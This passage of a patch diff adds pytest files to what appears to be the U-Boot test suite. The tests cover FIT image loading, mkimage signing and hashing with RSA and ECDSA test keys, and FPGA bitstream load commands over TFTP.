+base_script = ''' +host load hostfs 0 %(fit_addr)x %(fit)s +fdt addr %(fit_addr)x +bootm start %(fit_addr)x +bootm loados +host save hostfs 0 %(kernel_addr)x %(kernel_out)s %(kernel_size)x +host save hostfs 0 %(fdt_addr)x %(fdt_out)s %(fdt_size)x +host save hostfs 0 %(ramdisk_addr)x %(ramdisk_out)s %(ramdisk_size)x +host save hostfs 0 %(loadables1_addr)x %(loadables1_out)s %(loadables1_size)x +host save hostfs 0 %(loadables2_addr)x %(loadables2_out)s %(loadables2_size)x +''' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +def test_fit(ubman): + def make_fname(leaf): + """Make a temporary filename + + Args: + leaf: Leaf name of file to create (within temporary directory) + Return: + Temporary filename + """ + return os.path.join(ubman.config.build_dir, leaf) + + def filesize(fname): + """Get the size of a file + + Args: + fname: Filename to check + Return: + Size of file in bytes + """ + return os.stat(fname).st_size + + def read_file(fname): + """Read the contents of a file + + Args: + fname: Filename to read + Returns: + Contents of file as a string + """ + with open(fname, 'rb') as fd: + return fd.read() + + def make_ramdisk(filename, text): + """Make a sample ramdisk with test data + + Returns: + Filename of ramdisk created + """ + fname = make_fname(filename) + data = '' + for i in range(100): + data += '%s %d was seldom used in the middle ages\n' % (text, i) + with open(fname, 'w') as fd: + print(data, file=fd) + return fname + + def make_compressed(filename): + utils.run_and_log(ubman, ['gzip', '-f', '-k', filename]) + return filename + '.gz' + + def find_matching(text, match): + """Find a match in a line of text, and return the unmatched line portion + + This is used to extract a part of a line from some text. The match string + is used to locate the line - we use the first line that contains that + match text. + + Once we find a match, we discard the match string itself from the line, + and return what remains. + + TODO: If this function becomes more generally useful, we could change it + to use regex and return groups. + + Args: + text: Text to check (list of strings, one for each command issued) + match: String to search for + Return: + String containing unmatched portion of line + Exceptions: + ValueError: If match is not found + + >>> find_matching(['first line:10', 'second_line:20'], 'first line:') + '10' + >>> find_matching(['first line:10', 'second_line:20'], 'second line') + Traceback (most recent call last): + ... + ValueError: Test aborted + >>> find_matching('first line:10\', 'second_line:20'], 'second_line:') + '20' + >>> find_matching('first line:10\', 'second_line:20\nthird_line:30'], + 'third_line:') + '30' + """ + __tracebackhide__ = True + for line in '\n'.join(text).splitlines(): + pos = line.find(match) + if pos != -1: + return line[:pos] + line[pos + len(match):] + + pytest.fail("Expected '%s' but not found in output") + + def check_equal(expected_fname, actual_fname, failure_msg): + """Check that a file matches its expected contents + + This is always used on out-buffers whose size is decided by the test + script anyway, which in some cases may be larger than what we're + actually looking for. So it's safe to truncate it to the size of the + expected data. 
+ + Args: + expected_fname: Filename containing expected contents + actual_fname: Filename containing actual contents + failure_msg: Message to print on failure + """ + expected_data = read_file(expected_fname) + actual_data = read_file(actual_fname) + if len(expected_data) < len(actual_data): + actual_data = actual_data[:len(expected_data)] + assert expected_data == actual_data, failure_msg + + def check_not_equal(expected_fname, actual_fname, failure_msg): + """Check that a file does not match its expected contents + + Args: + expected_fname: Filename containing expected contents + actual_fname: Filename containing actual contents + failure_msg: Message to print on failure + """ + expected_data = read_file(expected_fname) + actual_data = read_file(actual_fname) + assert expected_data != actual_data, failure_msg + + def run_fit_test(mkimage): + """Basic sanity check of FIT loading in U-Boot + + TODO: Almost everything: + - hash algorithms - invalid hash/contents should be detected + - signature algorithms - invalid sig/contents should be detected + - compression + - checking that errors are detected like: + - image overwriting + - missing images + - invalid configurations + - incorrect os/arch/type fields + - empty data + - images too large/small + - invalid FDT (e.g. putting a random binary in instead) + - default configuration selection + - bootm command line parameters should have desired effect + - run code coverage to make sure we are testing all the code + """ + # Set up invariant files + control_dtb = fit_util.make_dtb(ubman, base_fdt, 'u-boot') + kernel = fit_util.make_kernel(ubman, 'test-kernel.bin', 'kernel') + ramdisk = make_ramdisk('test-ramdisk.bin', 'ramdisk') + loadables1 = fit_util.make_kernel(ubman, 'test-loadables1.bin', 'lenrek') + loadables2 = make_ramdisk('test-loadables2.bin', 'ksidmar') + kernel_out = make_fname('kernel-out.bin') + fdt = make_fname('u-boot.dtb') + fdt_out = make_fname('fdt-out.dtb') + ramdisk_out = make_fname('ramdisk-out.bin') + loadables1_out = make_fname('loadables1-out.bin') + loadables2_out = make_fname('loadables2-out.bin') + + # Set up basic parameters with default values + params = { + 'fit_addr' : 0x1000, + + 'kernel' : kernel, + 'kernel_out' : kernel_out, + 'kernel_addr' : 0x40000, + 'kernel_size' : filesize(kernel), + + 'fdt' : fdt, + 'fdt_out' : fdt_out, + 'fdt_addr' : 0x80000, + 'fdt_size' : filesize(control_dtb), + 'fdt_load' : '', + + 'ramdisk' : ramdisk, + 'ramdisk_out' : ramdisk_out, + 'ramdisk_addr' : 0xc0000, + 'ramdisk_size' : filesize(ramdisk), + 'ramdisk_load' : '', + 'ramdisk_config' : '', + + 'loadables1' : loadables1, + 'loadables1_out' : loadables1_out, + 'loadables1_addr' : 0x100000, + 'loadables1_size' : filesize(loadables1), + 'loadables1_load' : '', + + 'loadables2' : loadables2, + 'loadables2_out' : loadables2_out, + 'loadables2_addr' : 0x140000, + 'loadables2_size' : filesize(loadables2), + 'loadables2_load' : '', + + 'loadables_config' : '', + 'compression' : 'none', + } + + # Make a basic FIT and a script to load it + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + params['fit'] = fit + cmd = base_script % params + + # First check that we can load a kernel + # We could perhaps reduce duplication with some loss of readability + ubman.config.dtb = control_dtb + ubman.restart_uboot() + with ubman.log.section('Kernel load'): + output = ubman.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_not_equal(control_dtb, fdt_out, + 'FDT loaded but should be ignored') + 
check_not_equal(ramdisk, ramdisk_out, + 'Ramdisk loaded but should not be') + + # Find out the offset in the FIT where U-Boot has found the FDT + line = find_matching(output, 'Booting using the fdt blob at ') + fit_offset = int(line, 16) - params['fit_addr'] + fdt_magic = struct.pack('>L', 0xd00dfeed) + data = read_file(fit) + + # Now find where it actually is in the FIT (skip the first word) + real_fit_offset = data.find(fdt_magic, 4) + assert fit_offset == real_fit_offset, ( + 'U-Boot loaded FDT from offset %#x, FDT is actually at %#x' % + (fit_offset, real_fit_offset)) + + # Check if bootargs strings substitution works + output = ubman.run_command_list([ + 'env set bootargs \\\"\'my_boot_var=${foo}\'\\\"', + 'env set foo bar', + 'bootm prep', + 'env print bootargs']) + assert 'bootargs="my_boot_var=bar"' in output, "Bootargs strings not substituted" + + # Now a kernel and an FDT + with ubman.log.section('Kernel + FDT load'): + params['fdt_load'] = 'load = <%#x>;' % params['fdt_addr'] + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + ubman.restart_uboot() + output = ubman.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_equal(control_dtb, fdt_out, 'FDT not loaded') + check_not_equal(ramdisk, ramdisk_out, + 'Ramdisk loaded but should not be') + + # Try a ramdisk + with ubman.log.section('Kernel + FDT + Ramdisk load'): + params['ramdisk_config'] = 'ramdisk = "ramdisk-1";' + params['ramdisk_load'] = 'load = <%#x>;' % params['ramdisk_addr'] + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + ubman.restart_uboot() + output = ubman.run_command_list(cmd.splitlines()) + check_equal(ramdisk, ramdisk_out, 'Ramdisk not loaded') + + # Configuration with some Loadables + with ubman.log.section('Kernel + FDT + Ramdisk load + Loadables'): + params['loadables_config'] = 'loadables = "kernel-2", "ramdisk-2";' + params['loadables1_load'] = ('load = <%#x>;' % + params['loadables1_addr']) + params['loadables2_load'] = ('load = <%#x>;' % + params['loadables2_addr']) + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + ubman.restart_uboot() + output = ubman.run_command_list(cmd.splitlines()) + check_equal(loadables1, loadables1_out, + 'Loadables1 (kernel) not loaded') + check_equal(loadables2, loadables2_out, + 'Loadables2 (ramdisk) not loaded') + + # Kernel, FDT and Ramdisk all compressed + with ubman.log.section('(Kernel + FDT + Ramdisk) compressed'): + params['compression'] = 'gzip' + params['kernel'] = make_compressed(kernel) + params['fdt'] = make_compressed(fdt) + params['ramdisk'] = make_compressed(ramdisk) + fit = fit_util.make_fit(ubman, mkimage, base_its, params) + ubman.restart_uboot() + output = ubman.run_command_list(cmd.splitlines()) + check_equal(kernel, kernel_out, 'Kernel not loaded') + check_equal(control_dtb, fdt_out, 'FDT not loaded') + check_not_equal(ramdisk, ramdisk_out, 'Ramdisk got decompressed?') + check_equal(ramdisk + '.gz', ramdisk_out, 'Ramdist not loaded') + + + # We need to use our own device tree file. Remember to restore it + # afterwards. + old_dtb = ubman.config.dtb + try: + mkimage = ubman.config.build_dir + '/tools/mkimage' + run_fit_test(mkimage) + finally: + # Go back to the original U-Boot with the correct dtb. 
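+        # run_fit_test() pointed ubman.config.dtb at the generated control
+        # DTB; restoring the saved value and rebooting ensures later tests
+        # run with the normal sandbox device tree.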
+ ubman.config.dtb = old_dtb + ubman.restart_uboot() diff --git a/test/py/tests/test_fit_auto_signed.py b/test/py/tests/test_fit_auto_signed.py new file mode 100644 index 00000000000..cdfd341c6f5 --- /dev/null +++ b/test/py/tests/test_fit_auto_signed.py @@ -0,0 +1,194 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2022 Massimo Pegorer + +""" +Test that mkimage generates auto-FIT with signatures and/or hashes as expected. + +The mkimage tool can create auto generated (i.e. without an ITS file +provided as input) FIT in three different flavours: with crc32 checksums +of 'images' subnodes; with signatures of 'images' subnodes; with sha1 +hashes of 'images' subnodes and signatures of 'configurations' subnodes. +This test verifies that auto-FIT are generated as expected, in all of +the three flavours, including check of hashes and signatures (except for +configurations ones). + +The test does not run the sandbox. It only checks the host tool mkimage. +""" + +import os +import pytest +import utils +import binascii +from Cryptodome.Hash import SHA1 +from Cryptodome.Hash import SHA256 +from Cryptodome.PublicKey import RSA +from Cryptodome.Signature import pkcs1_15 + +class SignedFitHelper(object): + """Helper to manipulate a FIT with signed/hashed images/configs.""" + def __init__(self, ubman, file_name): + self.fit = file_name + self.ubman = ubman + self.images_nodes = set() + self.confgs_nodes = set() + + def __fdt_list(self, path): + return utils.run_and_log(self.ubman, + f'fdtget -l {self.fit} {path}') + + def __fdt_get_string(self, node, prop): + return utils.run_and_log(self.ubman, + f'fdtget -ts {self.fit} {node} {prop}') + + def __fdt_get_binary(self, node, prop): + numbers = utils.run_and_log(self.ubman, + f'fdtget -tbi {self.fit} {node} {prop}') + + bignum = bytearray() + for little_num in numbers.split(): + bignum.append(int(little_num)) + + return bignum + + def build_nodes_sets(self): + """Fill sets with FIT images and configurations subnodes.""" + for node in self.__fdt_list('/images').split(): + subnode = f'/images/{node}' + self.images_nodes.add(subnode) + + for node in self.__fdt_list('/configurations').split(): + subnode = f'/configurations/{node}' + self.confgs_nodes.add(subnode) + + return len(self.images_nodes) + len(self.confgs_nodes) + + def check_fit_crc32_images(self): + """Test that all images in the set are hashed as expected. + + Each image must have an hash with algo=crc32 and hash value must match + the one calculated over image data. + """ + for node in self.images_nodes: + algo = self.__fdt_get_string(f'{node}/hash', 'algo') + assert algo == "crc32\n", "Missing expected crc32 image hash!" + + raw_crc32 = self.__fdt_get_binary(f'{node}/hash', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + assert raw_crc32 == (binascii.crc32(raw_bin) & + 0xffffffff).to_bytes(4, 'big'), "Wrong crc32 hash!" + + def check_fit_signed_images(self, key_name, sign_algo, verifier): + """Test that all images in the set are signed as expected. + + Each image must have a signature with: key-name-hint matching key_name + argument; algo matching sign_algo argument; value matching the one + calculated over image data using verifier argument. + """ + for node in self.images_nodes: + hint = self.__fdt_get_string(f'{node}/signature', 'key-name-hint') + assert hint == key_name + "\n", "Missing expected key name hint!" + algo = self.__fdt_get_string(f'{node}/signature', 'algo') + assert algo == sign_algo + "\n", "Missing expected signature algo!" 
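+
+            # pkcs1_15 verifiers raise ValueError on a mismatch, so the
+            # verify() call below only returns if the image signature is
+            # valid for the supplied key.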
+ + raw_sig = self.__fdt_get_binary(f'{node}/signature', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + verifier.verify(SHA256.new(raw_bin), bytes(raw_sig)) + + def check_fit_signed_confgs(self, key_name, sign_algo): + """Test that all configs are signed, and images hashed, as expected. + + Each image must have an hash with algo=sha1 and hash value must match + the one calculated over image data. Each configuration must have a + signature with key-name-hint matching key_name argument and algo + matching sign_algo argument. + TODO: configurations signature checking. + """ + for node in self.images_nodes: + algo = self.__fdt_get_string(f'{node}/hash', 'algo') + assert algo == "sha1\n", "Missing expected sha1 image hash!" + + raw_hash = self.__fdt_get_binary(f'{node}/hash', 'value') + raw_bin = self.__fdt_get_binary(node, 'data') + assert raw_hash == SHA1.new(raw_bin).digest(), "Wrong sha1 hash!" + + for node in self.confgs_nodes: + hint = self.__fdt_get_string(f'{node}/signature', 'key-name-hint') + assert hint == key_name + "\n", "Missing expected key name hint!" + algo = self.__fdt_get_string(f'{node}/signature', 'algo') + assert algo == sign_algo + "\n", "Missing expected signature algo!" + + +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('fdtget') +def test_fit_auto_signed(ubman): + """Test that mkimage generates auto-FIT with signatures/hashes as expected. + + The mkimage tool can create auto generated (i.e. without an ITS file + provided as input) FIT in three different flavours: with crc32 checksums + of 'images' subnodes; with signatures of 'images' subnodes; with sha1 + hashes of 'images' subnodes and signatures of 'configurations' subnodes. + This test verifies that auto-FIT are generated as expected, in all of + the three flavours, including check of hashes and signatures (except for + configurations ones). + + The test does not run the sandbox. It only checks the host tool mkimage. 
+ """ + mkimage = ubman.config.build_dir + '/tools/mkimage' + tempdir = os.path.join(ubman.config.result_dir, 'auto_fit') + os.makedirs(tempdir, exist_ok=True) + kernel_file = f'{tempdir}/vmlinuz' + dt1_file = f'{tempdir}/dt-1.dtb' + dt2_file = f'{tempdir}/dt-2.dtb' + key_name = 'sign-key' + sign_algo = 'sha256,rsa4096' + key_file = f'{tempdir}/{key_name}.key' + fit_file = f'{tempdir}/test.fit' + + # Create a fake kernel image and two dtb files with random data + with open(kernel_file, 'wb') as fd: + fd.write(os.urandom(512)) + + with open(dt1_file, 'wb') as fd: + fd.write(os.urandom(256)) + + with open(dt2_file, 'wb') as fd: + fd.write(os.urandom(256)) + + # Create 4096 RSA key and write to file to be read by mkimage + key = RSA.generate(bits=4096) + verifier = pkcs1_15.new(key) + + with open(key_file, 'w') as fd: + fd.write(str(key.export_key(format='PEM').decode('ascii'))) + + b_args = " -d" + kernel_file + " -b" + dt1_file + " -b" + dt2_file + s_args = " -k" + tempdir + " -g" + key_name + " -o" + sign_algo + + # 1 - Create auto FIT with images crc32 checksum, and verify it + utils.run_and_log(ubman, mkimage + ' -fauto' + b_args + " " + fit_file) + + fit = SignedFitHelper(ubman, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-1 has no "/image" nor "/configuration" nodes') + + fit.check_fit_crc32_images() + + # 2 - Create auto FIT with signed images, and verify it + utils.run_and_log(ubman, mkimage + ' -fauto' + b_args + s_args + " " + + fit_file) + + fit = SignedFitHelper(ubman, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-2 has no "/image" nor "/configuration" nodes') + + fit.check_fit_signed_images(key_name, sign_algo, verifier) + + # 3 - Create auto FIT with signed configs and hashed images, and verify it + utils.run_and_log(ubman, mkimage + ' -fauto-conf' + b_args + s_args + " " + + fit_file) + + fit = SignedFitHelper(ubman, fit_file) + if fit.build_nodes_sets() == 0: + raise ValueError('FIT-3 has no "/image" nor "/configuration" nodes') + + fit.check_fit_signed_confgs(key_name, sign_algo) diff --git a/test/py/tests/test_fit_ecdsa.py b/test/py/tests/test_fit_ecdsa.py new file mode 100644 index 00000000000..3e816d68eb6 --- /dev/null +++ b/test/py/tests/test_fit_ecdsa.py @@ -0,0 +1,114 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2020,2021 Alexandru Gagniuc <mr.nuke.me@gmail.com> + +""" +Test ECDSA signing of FIT images + +This test uses mkimage to sign an existing FIT image with an ECDSA key. The +signature is then extracted, and verified against pyCryptodome. +This test doesn't run the sandbox. 
It only checks the host tool 'mkimage' +""" + +import os +import pytest +import utils +from Cryptodome.Hash import SHA256 +from Cryptodome.PublicKey import ECC +from Cryptodome.Signature import DSS + +class SignableFitImage(object): + """ Helper to manipulate a FIT image on disk """ + def __init__(self, ubman, file_name): + self.fit = file_name + self.ubman = ubman + self.signable_nodes = set() + + def __fdt_list(self, path): + return utils.run_and_log(self.ubman, f'fdtget -l {self.fit} {path}') + + def __fdt_set(self, node, **prop_value): + for prop, value in prop_value.items(): + utils.run_and_log(self.ubman, + f'fdtput -ts {self.fit} {node} {prop} {value}') + + def __fdt_get_binary(self, node, prop): + numbers = utils.run_and_log(self.ubman, + f'fdtget -tbi {self.fit} {node} {prop}') + + bignum = bytearray() + for little_num in numbers.split(): + bignum.append(int(little_num)) + + return bignum + + def find_signable_image_nodes(self): + for node in self.__fdt_list('/images').split(): + image = f'/images/{node}' + if 'signature' in self.__fdt_list(image): + self.signable_nodes.add(image) + + return self.signable_nodes + + def change_signature_algo_to_ecdsa(self): + for image in self.signable_nodes: + self.__fdt_set(f'{image}/signature', algo='sha256,ecdsa256') + + def sign(self, mkimage, key_file): + utils.run_and_log(self.ubman, [mkimage, '-F', self.fit, f'-G{key_file}']) + + def check_signatures(self, key): + for image in self.signable_nodes: + raw_sig = self.__fdt_get_binary(f'{image}/signature', 'value') + raw_bin = self.__fdt_get_binary(image, 'data') + + sha = SHA256.new(raw_bin) + verifier = DSS.new(key, 'fips-186-3') + verifier.verify(sha, bytes(raw_sig)) + + +@pytest.mark.buildconfigspec('fit_signature') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +def test_fit_ecdsa(ubman): + """ Test that signatures generated by mkimage are legible. 
""" + def generate_ecdsa_key(): + return ECC.generate(curve='prime256v1') + + def assemble_fit_image(dest_fit, its, destdir): + dtc_args = f'-I dts -O dtb -i {destdir}' + utils.run_and_log(ubman, [mkimage, '-D', dtc_args, '-f', its, dest_fit]) + + def dtc(dts): + dtb = dts.replace('.dts', '.dtb') + utils.run_and_log(ubman, f'dtc {datadir}/{dts} -O dtb -o {tempdir}/{dtb}') + + mkimage = ubman.config.build_dir + '/tools/mkimage' + datadir = ubman.config.source_dir + '/test/py/tests/vboot/' + tempdir = os.path.join(ubman.config.result_dir, 'ecdsa') + os.makedirs(tempdir, exist_ok=True) + key_file = f'{tempdir}/ecdsa-test-key.pem' + fit_file = f'{tempdir}/test.fit' + dtc('sandbox-kernel.dts') + + key = generate_ecdsa_key() + + # Create a fake kernel image -- zeroes will do just fine + with open(f'{tempdir}/test-kernel.bin', 'w') as fd: + fd.write(500 * chr(0)) + + # invocations of mkimage expect to read the key from disk + with open(key_file, 'w') as f: + f.write(key.export_key(format='PEM')) + + assemble_fit_image(fit_file, f'{datadir}/sign-images-sha256.its', tempdir) + + fit = SignableFitImage(ubman, fit_file) + nodes = fit.find_signable_image_nodes() + if len(nodes) == 0: + raise ValueError('FIT image has no "/image" nodes with "signature"') + + fit.change_signature_algo_to_ecdsa() + fit.sign(mkimage, key_file) + fit.check_signatures(key) diff --git a/test/py/tests/test_fit_hashes.py b/test/py/tests/test_fit_hashes.py new file mode 100644 index 00000000000..07bf0fd5211 --- /dev/null +++ b/test/py/tests/test_fit_hashes.py @@ -0,0 +1,115 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2021 Alexandru Gagniuc <mr.nuke.me@gmail.com> + +""" +Check hashes produced by mkimage against known values + +This test checks the correctness of mkimage's hashes. by comparing the mkimage +output of a fixed data block with known good hashes. +This test doesn't run the sandbox. 
It only checks the host tool 'mkimage' +""" + +import os +import pytest +import utils + +kernel_hashes = { + "sha512" : "f18c1486a2c29f56360301576cdfce4dfd8e8e932d0ed8e239a1f314b8ae1d77b2a58cd7fe32e4075e69448e623ce53b0b6aa6ce5626d2c189a5beae29a68d93", + "sha384" : "16e28976740048485d08d793d8bf043ebc7826baf2bc15feac72825ad67530ceb3d09e0deb6932c62a5a0e9f3936baf4", + "sha256" : "2955c56bc1e5050c111ba6e089e0f5342bb47dedf77d87e3f429095feb98a7e5", + "sha1" : "652383e1a6d946953e1f65092c9435f6452c2ab7", + "md5" : "4879e5086e4c76128e525b5fe2af55f1", + "crc32" : "32eddfdf", + "crc16-ccitt" : "d4be" +} + +class ReadonlyFitImage(object): + """ Helper to manipulate a FIT image on disk """ + def __init__(self, ubman, file_name): + self.fit = file_name + self.ubman = ubman + self.hashable_nodes = set() + + def __fdt_list(self, path): + return utils.run_and_log(self.ubman, f'fdtget -l {self.fit} {path}') + + def __fdt_get(self, node, prop): + val = utils.run_and_log(self.ubman, f'fdtget {self.fit} {node} {prop}') + return val.rstrip('\n') + + def __fdt_get_sexadecimal(self, node, prop): + numbers = utils.run_and_log(self.ubman, + f'fdtget -tbx {self.fit} {node} {prop}') + + sexadecimal = '' + for num in numbers.rstrip('\n').split(' '): + sexadecimal += num.zfill(2) + return sexadecimal + + def find_hashable_image_nodes(self): + for node in self.__fdt_list('/images').split(): + # We only have known hashes for the kernel node + if 'kernel' not in node: + continue + self.hashable_nodes.add(f'/images/{node}') + + return self.hashable_nodes + + def verify_hashes(self): + for image in self.hashable_nodes: + algos = set() + for node in self.__fdt_list(image).split(): + if "hash-" not in node: + continue + + raw_hash = self.__fdt_get_sexadecimal(f'{image}/{node}', 'value') + algo = self.__fdt_get(f'{image}/{node}', 'algo') + algos.add(algo) + + good_hash = kernel_hashes[algo] + if good_hash != raw_hash: + raise ValueError(f'{image} Borked hash: {algo}'); + + # Did we test all the hashes we set out to test? + missing_algos = kernel_hashes.keys() - algos + if (missing_algos): + raise ValueError(f'Missing hashes from FIT: {missing_algos}') + + +@pytest.mark.buildconfigspec('hash') +@pytest.mark.requiredtool('dtc') +@pytest.mark.requiredtool('fdtget') +@pytest.mark.requiredtool('fdtput') +def test_mkimage_hashes(ubman): + """ Test that hashes generated by mkimage are correct. 
""" + + def assemble_fit_image(dest_fit, its, destdir): + dtc_args = f'-I dts -O dtb -i {destdir}' + utils.run_and_log(ubman, [mkimage, '-D', dtc_args, '-f', its, dest_fit]) + + def dtc(dts): + dtb = dts.replace('.dts', '.dtb') + utils.run_and_log(ubman, + f'dtc {datadir}/{dts} -O dtb -o {tempdir}/{dtb}') + + mkimage = ubman.config.build_dir + '/tools/mkimage' + datadir = ubman.config.source_dir + '/test/py/tests/vboot/' + tempdir = os.path.join(ubman.config.result_dir, 'hashes') + os.makedirs(tempdir, exist_ok=True) + + fit_file = f'{tempdir}/test.fit' + dtc('sandbox-kernel.dts') + + # Create a fake kernel image -- Avoid zeroes or crc16 will be zero + with open(f'{tempdir}/test-kernel.bin', 'w') as fd: + fd.write(500 * chr(0xa5)) + + assemble_fit_image(fit_file, f'{datadir}/hash-images.its', tempdir) + + fit = ReadonlyFitImage(ubman, fit_file) + nodes = fit.find_hashable_image_nodes() + if len(nodes) == 0: + raise ValueError('FIT image has no "/image" nodes with "hash-..."') + + fit.verify_hashes() diff --git a/test/py/tests/test_fpga.py b/test/py/tests/test_fpga.py new file mode 100644 index 00000000000..74cd42b910e --- /dev/null +++ b/test/py/tests/test_fpga.py @@ -0,0 +1,565 @@ +# SPDX-License-Identifier: GPL-2.0 +# +# Copyright (c) 2018, Xilinx Inc. +# +# Michal Simek +# Siva Durga Prasad Paladugu + +import pytest +import re +import random +import utils + +""" +Note: This test relies on boardenv_* containing configuration values to define +the network available and files to be used for testing. Without this, this test +will be automatically skipped. + +For example: + +# True if a DHCP server is attached to the network, and should be tested. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. In this test case we atleast need serverip for performing tftpb +# to get required files. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding the files that may be read from a TFTP server. . 
+env__fpga_secure_readable_file = { + 'fn': 'auth_bhdr_ppk1_bit.bin', + 'enckupfn': 'auth_bhdr_enc_kup_load_bit.bin', + 'addr': 0x1000000, + 'keyaddr': 0x100000, + 'keyfn': 'key.txt', +} + +env__fpga_under_test = { + 'dev': 0, + 'addr' : 0x1000000, + 'bitstream_load': 'compress.bin', + 'bitstream_load_size': 1831960, + 'bitstream_loadp': 'compress_pr.bin', + 'bitstream_loadp_size': 423352, + 'bitstream_loadb': 'compress.bit', + 'bitstream_loadb_size': 1832086, + 'bitstream_loadbp': 'compress_pr.bit', + 'bitstream_loadbp_size': 423491, + 'mkimage_legacy': 'download.ub', + 'mkimage_legacy_size': 13321468, + 'mkimage_legacy_gz': 'download.gz.ub', + 'mkimage_legacy_gz_size': 53632, + 'mkimage_fit': 'download-fit.ub', + 'mkimage_fit_size': 13322784, + 'loadfs': 'mmc 0 compress.bin', + 'loadfs_size': 1831960, + 'loadfs_block_size': 0x10000, +} +""" + +import test_net + +def check_dev(ubman): + f = ubman.config.env.get('env__fpga_under_test', None) + if not f: + pytest.skip('No FPGA to test') + + dev = f.get('dev', -1) + if dev < 0: + pytest.fail('No dev specified via env__fpga_under_test') + + return dev, f + +def load_file_from_var(ubman, name): + dev, f = check_dev(ubman) + + addr = f.get('addr', -1) + if addr < 0: + pytest.fail('No address specified via env__fpga_under_test') + + test_net.test_net_dhcp(ubman) + test_net.test_net_setup_static(ubman) + bit = f['%s' % (name)] + bit_size = f['%s_size' % (name)] + + expected_tftp = 'Bytes transferred = %d' % bit_size + output = ubman.run_command('tftpboot %x %s' % (addr, bit)) + assert expected_tftp in output + + return f, dev, addr, bit, bit_size + +###### FPGA FAIL test ###### +expected_usage = 'fpga - loadable FPGA image support' + +@pytest.mark.xfail +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_fail(ubman): + # Test non valid fpga subcommand + expected = 'fpga: non existing command' + output = ubman.run_command('fpga broken 0') + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_help(ubman): + # Just show help + output = ubman.run_command('fpga') + assert expected_usage in output + + +###### FPGA DUMP tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_dump(ubman): + pytest.skip('Not implemented now') + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_dump_variable(ubman): + # Same as above but via "fpga" variable + pytest.skip('Not implemented now') + +###### FPGA INFO tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_fail(ubman): + # Maybe this can be skipped completely + dev, f = check_dev(ubman) + + # Multiple parameters to fpga info should fail + expected = 'fpga: more parameters passed' + output = ubman.run_command('fpga info 0 0') + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_list(ubman): + # Maybe this can be skipped completely + dev, f = check_dev(ubman) + + # Code is design in a way that if fpga dev is not passed it should + # return list of all fpga devices in the system + ubman.run_command('setenv fpga') + output = ubman.run_command('fpga info') + assert expected_usage not in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info(ubman): + dev, f = check_dev(ubman) + + output = ubman.run_command('fpga info %x' % (dev)) + assert expected_usage not in output + +@pytest.mark.buildconfigspec('cmd_fpga') +def test_fpga_info_variable(ubman): + dev, f = check_dev(ubman) + + # + # fpga variable is storing 
device number which doesn't need to be passed + # + ubman.run_command('setenv fpga %x' % (dev)) + + output = ubman.run_command('fpga info') + # Variable cleanup + ubman.run_command('setenv fpga') + assert expected_usage not in output + +###### FPGA LOAD tests ###### + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_load_fail(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_load') + + for cmd in ['dump', 'load', 'loadb']: + # missing dev parameter + expected = 'fpga: incorrect parameters passed' + output = ubman.run_command('fpga %s %x $filesize' % (cmd, addr)) + #assert expected in output + assert expected_usage in output + + # more parameters - 0 at the end + expected = 'fpga: more parameters passed' + output = ubman.run_command('fpga %s %x %x $filesize 0' % (cmd, dev, addr)) + #assert expected in output + assert expected_usage in output + + # 0 address + expected = 'fpga: zero fpga_data address' + output = ubman.run_command('fpga %s %x 0 $filesize' % (cmd, dev)) + #assert expected in output + assert expected_usage in output + + # 0 filesize + expected = 'fpga: zero size' + output = ubman.run_command('fpga %s %x %x 0' % (cmd, dev, addr)) + #assert expected in output + assert expected_usage in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_load(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_load') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga load %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_fpga_loadp') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadp(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_load') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga load %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + + # And load also partial bistream + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 'bitstream_loadp') + + expected_text = 'FPGA loaded successfully' + output = ubman.run_command('fpga loadp %x %x $filesize && echo %s' % (dev, addr, expected_text)) + assert expected_text in output + +@pytest.mark.buildconfigspec('cmd_fpga') +@pytest.mark.buildconfigspec('cmd_echo') +def test_fpga_loadb(ubman): + f, dev, addr, bit, bit_size = load_file_from_var(ubman, 